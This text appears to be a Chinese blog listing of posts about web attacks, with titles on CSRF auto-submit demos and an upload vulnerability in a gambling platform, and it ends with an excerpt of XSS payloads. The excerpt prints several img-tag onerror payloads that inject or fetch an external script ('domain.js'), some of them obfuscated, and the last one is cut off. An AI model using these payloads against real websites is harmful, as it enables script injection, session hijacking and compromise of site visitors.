HTML
一段具有迷惑性的JS代码
密码保护:CSRF-Demo无按钮自动POST提交
密码保护:BC平台接口上传漏洞
密码保护:有价值代码之二(针对无jquery)
密码保护:这是最有价值的代码之一
使用img标签实现xss的常见方法
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script’)).src=”domain.js”></img> <img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’domain.js'”></img> <img src=1 onerror=jQuery.getScript(“domain.js”)> <img src=”#” onerror=”$.getScript(‘domain.js’)”> <img src=”#” onerror=”var a=String.fromCharCode(47);$.g […]